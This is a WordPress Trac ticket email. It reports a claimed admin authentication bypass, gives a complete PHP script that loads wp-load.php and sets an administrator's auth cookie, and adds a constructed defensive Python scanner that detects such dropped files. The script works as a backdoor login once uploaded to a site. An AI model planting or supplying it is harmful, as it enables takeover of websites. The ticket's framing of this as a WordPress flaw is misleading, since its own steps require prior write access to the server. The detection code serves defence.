[wp-trac] [WordPress Trac] #64924: Admin Authentication Bypass Vulnerability via wp-load.php
WordPress Trac
noreply at wordpress.org
Sun Mar 22 17:42:13 UTC 2026
#64924: Admin Authentication Bypass Vulnerability via wp-load.php
--------------------------+-----------------------------
 Reporter:  sajibekanti   |       Owner:  (none)
     Type:  defect (bug)  |      Status:  new
 Priority:  normal        |   Milestone:  Awaiting Review
Component:  General       |     Version:  6.9.4
 Severity:  normal        |    Keywords:
  Focuses:                |
--------------------------+-----------------------------
**1. Title**:
`Admin Authentication Bypass Vulnerability via wp-load.php`
**2. Summary**:
A vulnerability exists in WordPress where an attacker can bypass
authentication and gain full administrator access using a custom PHP
script. The script includes `wp-load.php` and uses WordPress functions
like `wp_set_current_user()` and `wp_set_auth_cookie()` to log in as an
administrator without the need for credentials.
**3. Steps to Reproduce**:
1. Create a new PHP file (e.g., `wp.php`).
2. Paste the following code into the file:
```php
<?php
// Walk up the directory tree until wp-load.php is found (at most 100 levels).
$t = 0;
$wpLoadFile = 'wp-load.php';
while (!file_exists($wpLoadFile)) {
    if ($t > 100) break;
    $wpLoadFile = '../' . $wpLoadFile;
    $t++;
}
if (file_exists($wpLoadFile)) require_once($wpLoadFile);

$users = get_users(['role' => 'administrator', 'orderby' => 'user_registered', 'order' => 'ASC']);
foreach ($users as $user) {
    if (user_can($user, 'administrator')) {
        if (function_exists('wp_set_current_user')) {
            wp_set_current_user($user->ID, $user->user_login);
            wp_set_auth_cookie($user->ID);
            wp_redirect(get_admin_url());
            exit;
        }
    }
}
?>
```
3. Upload the PHP file to a WordPress site (e.g., in the root directory or
another accessible directory).
4. Access the PHP file via the browser (e.g.,
`http://example.com/wp.php`).
5. The script should bypass the login mechanism and automatically log you
into the WordPress admin panel as an administrator.
**4. Expected Behavior**:
The code should not bypass the login system and should require
authentication before granting admin access.
**5. Actual Behavior**:
The script bypasses the login process, allowing unauthorized access to the
WordPress admin dashboard by setting an authentication cookie and
redirecting to the admin panel.
**6. Possible Impact**:
This vulnerability allows an attacker to gain **administrator access** to
any WordPress site, effectively taking full control of the site. It can
lead to unauthorized content modifications, data loss, or further
exploitation.
**7. Affected Versions**:
This vulnerability is relevant to **all versions of WordPress** that do
not restrict access to `wp-load.php` or secure it appropriately.
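Added example, not part of the ticket and not WordPress code: a read-only scanner, written here from the defender's side, that walks a document root for the pattern the report's `wp.php` shows, a non-core PHP file that bootstraps WordPress through `wp-load.php` and then calls `wp_set_auth_cookie()`, `wp_set_current_user()` or `wp_signon()`. Such a file can only run after someone is already able to write PHP under the web root (step 3 above), so locating and removing the file, and closing the write path that admitted it, is the practical control. The heuristic weights, the threshold, the regular expressions and the list of core root files are assumptions; both sample sources are constructed.

```python
"""Scan a WordPress document root for stray PHP files that load wp-load.php
and then mint a logged-in session. Constructed example; weights and core
file lists are assumptions, not WordPress or ticket code."""
import os
import re
from dataclasses import dataclass, field

# WordPress API calls that establish a logged-in user from server-side code.
SESSION_FUNCS = ("wp_set_auth_cookie", "wp_set_current_user", "wp_signon")
INCLUDE_RE = re.compile(r"wp-load\.php")
# The "walk up the tree until wp-load.php appears" idiom:  '../' . $var
UPWALK_RE = re.compile(r"""['"]\.\./['"]\s*\.\s*\$\w+""")
# Core trees are better checked against upstream checksums; the scanner skips
# them so wp-login.php (which legitimately calls wp_signon) does not drown
# the real findings. Assumed layout of a stock install.
CORE_PREFIXES = ("wp-admin/", "wp-includes/")
CORE_ROOT_FILES = {
    "index.php", "wp-blog-header.php", "wp-load.php", "wp-config.php",
    "wp-settings.php", "wp-login.php", "wp-activate.php", "wp-signup.php",
    "wp-cron.php", "xmlrpc.php", "wp-comments-post.php", "wp-trackback.php",
    "wp-links-opml.php", "wp-mail.php",
}
SUSPECT_THRESHOLD = 5  # assumed cut-off


@dataclass
class Finding:
    path: str                 # relative to the document root, '/' separated
    score: int
    reasons: list = field(default_factory=list)

    @property
    def suspect(self) -> bool:
        return self.score >= SUSPECT_THRESHOLD


def score_source(rel_path: str, source: str) -> Finding:
    """Score one PHP file by its contents and by where it sits in the tree."""
    rel = rel_path.replace(os.sep, "/")
    f = Finding(rel, 0)
    if rel.startswith(CORE_PREFIXES) or rel in CORE_ROOT_FILES:
        f.reasons.append("core file: verify against checksums instead")
        return f
    includes = bool(INCLUDE_RE.search(source))
    funcs = [fn for fn in SESSION_FUNCS if fn in source]
    if includes:
        f.score += 1
        f.reasons.append("includes wp-load.php")
    if funcs:
        f.score += 2
        f.reasons.append("calls " + ", ".join(funcs))
    if includes and funcs:
        f.score += 2
        f.reasons.append("bootstraps WordPress and then creates a session")
    if UPWALK_RE.search(source):
        f.score += 2
        f.reasons.append("walks up the tree to locate wp-load.php")
    if rel.startswith("wp-content/uploads/"):
        f.score += 3
        f.reasons.append("PHP inside the uploads directory")
    elif "/" not in rel:
        f.score += 1
        f.reasons.append("non-core PHP in the web root")
    return f


def scan_webroot(root: str) -> list:
    """Walk a document root and return suspect findings, highest score first."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            try:
                with open(full, encoding="utf-8", errors="replace") as fh:
                    src = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            finding = score_source(rel, src)
            if finding.suspect:
                findings.append(finding)
    return sorted(findings, key=lambda x: x.score, reverse=True)


# Constructed samples: a dropped session-minting script and a benign plugin
# file that touches the current user without bootstrapping WordPress.
DROPPED_SCRIPT = """<?php
$wpLoadFile = 'wp-load.php';
while(!file_exists($wpLoadFile)){ $wpLoadFile = '../'.$wpLoadFile; }
require_once($wpLoadFile);
wp_set_current_user(1); wp_set_auth_cookie(1);
"""
BENIGN_PLUGIN = """<?php
add_action('init', function () { wp_set_current_user(get_current_user_id()); });
"""

if __name__ == "__main__":
    import sys
    import tempfile
    if len(sys.argv) > 1:
        root = sys.argv[1]
    else:  # no root given: build a throwaway tree from the constructed samples
        root = tempfile.mkdtemp()
        os.makedirs(os.path.join(root, "wp-content", "plugins", "demo"))
        with open(os.path.join(root, "wp.php"), "w") as fh:
            fh.write(DROPPED_SCRIPT)
        with open(os.path.join(root, "wp-content", "plugins", "demo", "demo.php"), "w") as fh:
            fh.write(BENIGN_PLUGIN)
    for hit in scan_webroot(root):
        print(f"{hit.score:2d} {hit.path}: {'; '.join(hit.reasons)}")
```

Run it as `python scan_wp_sessions.py /var/www/html`; without an argument it builds a temporary tree from the two constructed samples and reports only the dropped script. Core trees are skipped on purpose: `wp-login.php` legitimately includes `wp-load.php` and calls `wp_signon()`, so for `wp-admin/`, `wp-includes/` and the core root files compare against upstream checksums (for instance WP-CLI's `wp core verify-checksums`) instead of pattern-matching. A hit under `wp-content/uploads/` scores highest because PHP should never execute from there at all, which is also the directory an upload handler is most likely to have written to.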
--
Ticket URL: <https://core.trac.wordpress.org/ticket/64924>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform